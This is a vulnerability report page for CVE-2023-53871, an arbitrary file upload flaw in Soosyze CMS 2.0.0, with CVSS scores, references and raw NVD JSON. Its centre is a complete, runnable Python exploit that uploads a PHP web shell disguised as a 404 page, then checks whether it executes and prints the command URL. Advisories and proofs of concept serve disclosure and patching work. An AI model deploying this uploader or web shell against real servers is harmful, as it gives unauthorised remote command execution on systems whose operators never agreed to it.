Security Vulnerability Report
CVE-2023-53871 CVSS 9.8 CRITICAL

CVE-2023-53871

Published: 2025-12-15 21:15:50
Last Modified: 2025-12-30 18:46:35

Description

Soosyze 2.0.0 contains a file upload vulnerability that allows attackers to upload arbitrary HTML files with embedded PHP code to the application. Attackers can exploit the broken file upload mechanism to potentially view sensitive file paths and execute malicious PHP scripts on the server.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Note: the 9.8 CRITICAL is the NVD CVSS 3.1 (Primary) assessment. The CNA's own CVSS 4.0 vector in the raw JSON below (VC:L/VI:N/VA:N) scores the same issue 6.9 MEDIUM — low confidentiality impact, no integrity or availability impact. The two scorers therefore disagree on whether the uploaded PHP actually executes (the description itself says "potentially"); presumably this depends on the target's web server handing .html files to PHP. Treat the CRITICAL rating as conditional until execution is confirmed on the specific deployment.

Configurations (Affected Products)

cpe:2.3:a:soosyze:soosyze:2.0.0:*:*:*:*:*:*:* - VULNERABLE
Soosyze CMS 2.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
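import sys
from urllib.parse import urljoin

# CVE-2023-53871 PoC - Soosyze 2.0.0 Arbitrary File Upload
# Author: VulnCheck
# Reference: https://www.vulncheck.com/advisories/soosyze-unrestricted-file-upload-via-broken-upload-logic
#
# Assumptions this script makes that are NOT documented on this page -- confirm
# them against Exploit-DB 51718 / the VulnCheck advisory before trusting a result:
#   * `target_url` is the upload handler and accepts a multipart field named "file";
#   * the file is stored under `file_path` (default /uploads/) with its original name;
#   * the embedded PHP only runs if the web server hands .html files to the PHP
#     interpreter -- otherwise the upload succeeds but the file is served as text.
#
# NOTE(review): a successful run leaves exploit.html (a command shell) on the
# target; remove it after authorized testing unless the target cleans uploads.

UPLOAD_NAME = "exploit.html"

# Text the PHP echoes when executed without ?cmd -- used to tell
# "stored and executed" apart from "stored but served as static text".
EXEC_MARKER = "Shell uploaded successfully"
# Raw PHP open tag coming back in the response means the server did not run it.
RAW_MARKER = "<?php"

PHP_PAYLOAD = '''<?php
if(isset($_GET['cmd'])) {
    system($_GET['cmd']);
} else {
    echo "Shell uploaded successfully. Use ?cmd=<command>";
}
?>
'''


def build_payload(php_payload=PHP_PAYLOAD):
    """Return the HTML document (a fake 404 page) that wraps *php_payload*."""
    return f'''<!DOCTYPE html>
<html>
<head><title>404 Not Found</title></head>
<body>
{php_payload}
</body>
</html>
'''


def shell_url(target_url, file_path='/uploads/', name=UPLOAD_NAME):
    """Return the URL at which the uploaded file is expected to be served.

    Resolved with urljoin, so an upload endpoint such as
    ``http://host/index.php`` yields ``http://host/uploads/exploit.html``.
    (The original f-string concatenation produced
    ``http://host/index.php//uploads/exploit.html``, a URL that never resolves.)
    """
    return urljoin(target_url, file_path + name)


def classify(status_code, body):
    """Classify a GET of the uploaded file.

    Returns one of:
      'executed' - the PHP ran (EXEC_MARKER present, no raw PHP);
      'stored'   - the file is served verbatim (raw PHP visible) -> upload
                   works but this deployment does not execute it;
      'missing'  - 404 (wrong file_path, or the upload was rejected after all);
      'unknown'  - anything else; inspect manually.
    """
    if status_code == 404:
        return "missing"
    # Check the raw tag first: a verbatim copy also contains the echo string.
    if RAW_MARKER in body:
        return "stored"
    if EXEC_MARKER in body:
        return "executed"
    return "unknown"


def exploit(target_url, file_path='/uploads/', *, timeout=10):
    """Upload the PoC file to *target_url* and verify what happened to it.

    A 200 from the form handler only proves the request was accepted; it does
    not prove the file was stored or that PHP runs.  The upload is therefore
    followed by a GET of the expected location and the response is classified.

    Args:
        target_url: the upload endpoint (see module header for assumptions).
        file_path: web path under which uploads are served.
        timeout: per-request timeout in seconds.

    Returns:
        The classification string from :func:`classify`, or None when the
        upload request itself failed (non-200 status or network error).
    """
    # Imported here so the pure helpers above stay usable without requests.
    import requests

    files = {'file': (UPLOAD_NAME, build_payload(), 'text/html')}
    try:
        response = requests.post(target_url, files=files, timeout=timeout)
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None
    if response.status_code != 200:
        print(f"[-] Upload failed with status code: {response.status_code}")
        return None

    url = shell_url(target_url, file_path)
    try:
        check = requests.get(url, timeout=timeout)
    except requests.exceptions.RequestException as e:
        print(f"[?] Upload returned 200 but verification GET of {url} failed: {e}")
        return "unknown"

    result = classify(check.status_code, check.text)
    if result == "executed":
        print("[+] File uploaded and PHP is executed!")
        print(f"[+] Access the shell at: {url}?cmd=whoami")
    elif result == "stored":
        print(f"[!] File stored at {url} but served as static text (PHP not executed).")
    elif result == "missing":
        print(f"[-] Upload returned 200 but {url} is 404 -- wrong file_path or upload rejected.")
    else:
        print(f"[?] Unexpected response ({check.status_code}) from {url}; inspect manually.")
    return result


def main(argv=None):
    """CLI entry point: ``python <script> <target_url>``."""
    argv = sys.argv if argv is None else argv
    if len(argv) < 2:
        print(f"Usage: python {argv[0]} <target_url>")
        print(f"Example: python {argv[0]} http://target.com/index.php")
        sys.exit(1)
    exploit(argv[1])


if __name__ == "__main__":
    main()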

References

See the `references` array in the raw JSON below: the soosyze GitHub repository and soosyze.com (Product), Exploit-DB 51718 (Exploit, VDB Entry) and the VulnCheck advisory (Third Party Advisory). The weakness is classified as CWE-434 (Unrestricted Upload of File with Dangerous Type).

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53871", "sourceIdentifier": "[email protected]", "published": "2025-12-15T21:15:49.543", "lastModified": "2025-12-30T18:46:34.580", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Soosyze 2.0.0 contains a file upload vulnerability that allows attackers to upload arbitrary HTML files with embedded PHP code to the application. Attackers can exploit the broken file upload mechanism to potentially view sensitive file paths and execute malicious PHP scripts on the server."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": 
"NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:soosyze:soosyze:2.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "DA9B2D87-6534-4515-8A7C-91CD421C8D32"}]}]}], "references": [{"url": "https://github.com/soosyze/soosyze", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://soosyze.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51718", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/soosyze-unrestricted-file-upload-via-broken-upload-logic", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}